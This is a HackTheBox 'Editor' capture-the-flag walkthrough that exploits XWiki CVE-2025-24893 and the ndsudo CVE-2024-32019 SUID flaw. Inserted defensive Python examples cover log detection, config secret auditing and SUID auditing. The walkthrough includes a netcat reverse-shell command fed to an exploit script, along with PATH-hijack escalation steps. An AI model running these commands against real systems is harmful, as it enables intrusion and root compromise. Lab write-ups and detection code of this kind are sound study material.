
Editor

February 17, 2025 | HackTheBox | easy
#linux #xwiki #cve-2025-24893 #suid #cve-2024-32019
Editor cover image

Details

  • OS: Linux
  • Difficulty: Easy
  • IP Address: 10.10.11.80
  • Author: AETH3RON

Overview

Editor is an easy-difficulty Linux machine that exposes vulnerable services leading to remote code execution. The initial foothold is obtained by identifying a vulnerable version of XWiki affected by CVE-2025-24893, which allows RCE. After gaining access, we discover exposed credentials that can be used to establish an SSH connection. Privilege escalation is achieved through the abuse of an SUID binary, ultimately granting full root access.

Enumeration

Nmap

nmap -Pn -sS -sV -p- 10.10.11.80 -oN nmap-basic

Nmap Basic Scan

nmap -Pn -sS -sV -sC -p22,80,8080 10.10.11.80 -oN nmap-common

Nmap Common Scan

From the port scan, we observe three open ports. Port 22 is running SSH, port 80 is running nginx, and port 8080 is hosting a Jetty web server.

When browsing the service on port 8080, we identify an outdated XWiki instance that exposes its version:

XWiki Version Disclosure

Foothold

By analyzing the XWiki 15.10.8 instance, we identify that the application is vulnerable to CVE-2025-24893.

This vulnerability is caused by unsafe Groovy expression handling inside the SolrSearch macro. An attacker can inject Groovy code through a crafted GET request, leading to remote code execution.
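From the defender's side, the injection pattern described above is visible in the reverse proxy's access log: a request to the SolrSearch page whose query string carries wiki script-macro syntax. The following is an added example (not part of this write-up or of the XWiki project) that scans nginx combined-format log lines for that pattern. The endpoint path, the macro markers and the log lines are assumptions constructed for the example.

```python
# Added example: flag requests that look like script-macro injection against
# XWiki's SolrSearch page. Endpoint path, markers and log lines are assumptions
# constructed for this example, not data from the write-up.
import re
from urllib.parse import unquote_plus

# nginx "combined" access-log format
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*"$'
)

# Script-macro markers that have no business in a search query (assumption).
SUSPICIOUS_MARKERS = ("{{groovy", "{{/groovy", "{{velocity", "{{/velocity")


def decode_target(target: str) -> str:
    # Decode twice: braces and slashes are often double-encoded to slip past filters.
    return unquote_plus(unquote_plus(target))


def is_solrsearch_injection(target: str) -> bool:
    """True when the request targets the SolrSearch page and its decoded
    query contains a script-macro marker."""
    decoded = decode_target(target).lower()
    if "solrsearch" not in decoded:
        return False
    return any(m in decoded for m in SUSPICIOUS_MARKERS)


def scan_access_log(lines):
    """Return (ip, timestamp, decoded_target) for each suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        if is_solrsearch_injection(m["target"]):
            hits.append((m["ip"], m["ts"], decode_target(m["target"])))
    return hits


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [17/Feb/2025:10:01:02 +0000] "GET /xwiki/bin/view/Main/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [17/Feb/2025:10:01:10 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=xwiki HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [17/Feb/2025:10:02:33 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7B%7Bgroovy%7D%7Dprintln%281%29%7B%7B%2Fgroovy%7D%7D HTTP/1.1" 200 1502 "-" "python-requests/2.31"',
]

if __name__ == "__main__":
    for ip, ts, target in scan_access_log(SAMPLE_LOG):
        print(f"[ALERT] {ip} at {ts}: {target}")
```

Only the third sample line is reported. Matching on the decoded query rather than the raw one matters: the raw line contains no literal braces, so a naive substring rule on `{{groovy}}` would miss it.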

We can trigger the exploit using the following command:

python3 CVE-2025-24893.py -t 'http://10.10.XX.XX:8080' -c 'busybox nc 10.10.XX.XX 9001 -e /bin/bash'

A few seconds later, we receive an incoming connection on our Netcat listener, confirming remote code execution.

RCE Confirmation

Lateral Movement

Once inside the machine, we enumerate the filesystem and discover an interesting configuration file named hibernate.cfg.xml.

By inspecting its contents, we extract a hardcoded password that appears to correspond to the user oliver, based on the entries found in /etc/passwd.

Exposed Credentials
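The credential exposure above is a configuration-hygiene problem: a database password stored in plaintext in a file the application user (and here, the web-shell user) can read. As an added example (not from this write-up or from XWiki), the script below parses a Hibernate configuration in its standard layout, flags property names that look like credentials, and reports whether the file is readable by other users. The sample XML, the placeholder password and the file-permission check are assumptions for the example.

```python
# Added example: find plaintext credentials in a Hibernate configuration and
# check whether the file is world-readable. The XML sample and the password
# value are constructed placeholders, not data from the write-up.
import os
import stat
import tempfile
import xml.etree.ElementTree as ET

# Constructed sample following Hibernate's standard element layout.
SAMPLE_HIBERNATE_CFG = """<?xml version="1.0" encoding="UTF-8"?>
<hibernate-configuration>
  <session-factory>
    <property name="hibernate.connection.url">jdbc:mysql://localhost/xwiki</property>
    <property name="hibernate.connection.username">xwiki</property>
    <property name="hibernate.connection.password">PLACEHOLDER_PASSWORD</property>
    <property name="hibernate.connection.driver_class">com.mysql.cj.jdbc.Driver</property>
  </session-factory>
</hibernate-configuration>
"""

SECRET_KEYWORDS = ("password", "passwd", "secret")


def find_plaintext_secrets(xml_text: str):
    """Return (property_name, masked_value) for every <property> whose name
    looks like a credential and whose value is a non-empty literal."""
    root = ET.fromstring(xml_text)
    findings = []
    for prop in root.iter("property"):
        name = prop.get("name", "")
        value = (prop.text or "").strip()
        if not value:
            continue
        if any(k in name.lower() for k in SECRET_KEYWORDS):
            masked = value[:2] + "*" * max(len(value) - 2, 0)
            findings.append((name, masked))
    return findings


def is_world_readable(path: str) -> bool:
    """True when the 'other' read bit is set on the file."""
    return bool(os.stat(path).st_mode & stat.S_IROTH)


def audit_config_file(path: str):
    """Combine both checks for one file on disk."""
    with open(path, encoding="utf-8") as fh:
        secrets = find_plaintext_secrets(fh.read())
    return {"secrets": secrets, "world_readable": is_world_readable(path)}


def demo_audit_tempfile(mode: int = 0o644):
    """Self-contained run: write the sample config with the given mode and audit it."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "hibernate.cfg.xml")
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_HIBERNATE_CFG)
        os.chmod(path, mode)
        return audit_config_file(path)


if __name__ == "__main__":
    print(demo_audit_tempfile(0o644))  # secret found, world-readable
    print(demo_audit_tempfile(0o640))  # secret found, not world-readable
```

The username property is intentionally not flagged; only the value that grants access is. A finding here is a prompt to move the value into a secrets store or an environment-injected file with mode 0640 owned by the service account.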

With valid credentials, we can now log into the system via SSH as Oliver.

SSH Access as Oliver

Privilege Escalation

While enumerating SUID binaries on the system, we identify the ndsudo binary, which is owned by root and has the SUID bit set:

find / -user root -perm -4000 -print 2>/dev/null

Among the results, the following entry stands out: /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo

SUID Binary Enumeration
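The `find` command above is the same enumeration a host-hardening job should run on a schedule. The following added example (not part of this write-up or of Netdata) walks a tree for setuid regular files, reports those owned by root, and compares the result against an allowlist baseline so that an unexpected privileged helper such as the ndsudo path shows up as a finding. The baseline contents are an assumption; the ndsudo path is the one quoted above.

```python
# Added example: audit setuid binaries against a known-good baseline.
# The baseline list is an assumption; the scratch-directory demo constructs
# its own files so the walker can be exercised without root.
import os
import stat
import tempfile

# Path quoted in the write-up; the baseline below is an assumed allowlist.
NDSUDO_PATH = "/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo"
BASELINE = {
    "/usr/bin/passwd",
    "/usr/bin/sudo",
    "/usr/bin/su",
}


def find_setuid_files(root_dir: str):
    """Walk root_dir and return sorted paths of regular files with the setuid bit.
    Symlinks are not followed (lstat), so a link to a setuid file is not counted twice."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root_dir):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished entry
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return sorted(found)


def root_owned(paths):
    """Keep only the entries owned by uid 0; these are the ones that matter for LPE."""
    return [p for p in paths if os.stat(p).st_uid == 0]


def unexpected_setuid(found, baseline):
    """Return setuid paths that are not in the allowlist baseline."""
    return sorted(set(found) - set(baseline))


def demo_audit_tempdir():
    """Self-contained check: build a scratch tree with one setuid file and one
    ordinary file, return the base names the walker flags."""
    with tempfile.TemporaryDirectory() as d:
        suid = os.path.join(d, "helper")
        plain = os.path.join(d, "plain")
        for p in (suid, plain):
            open(p, "w").close()
        os.chmod(suid, 0o4755)   # setuid + rwxr-xr-x
        os.chmod(plain, 0o755)
        return [os.path.basename(p) for p in find_setuid_files(d)]


if __name__ == "__main__":
    # Real run: audit the whole filesystem against the baseline.
    live = root_owned(find_setuid_files("/"))
    for path in unexpected_setuid(live, BASELINE):
        print(f"[FINDING] unexpected root-owned setuid binary: {path}")
```

Running this against the machine's filesystem with the assumed baseline would list the ndsudo path as a finding, which is exactly the prompt to check the binary's version and patch status before an attacker does.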

After researching the binary, we discover that ndsudo is vulnerable to CVE-2024-32019, which allows local privilege escalation due to improper input validation and insecure handling of privileged operations.

This vulnerability can be exploited to execute arbitrary commands as root, ultimately granting full system compromise. To exploit this issue, we download a working proof-of-concept and compile it:

gcc poc.c -o nvme

We then transfer the compiled binary to the target machine and execute it:

scp nvme oliver@10.10.11.80:/tmp/
chmod +x nvme
export PATH=/tmp:$PATH
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list

After execution, we successfully obtain a root shell and complete the privilege escalation.

Root Shell Access
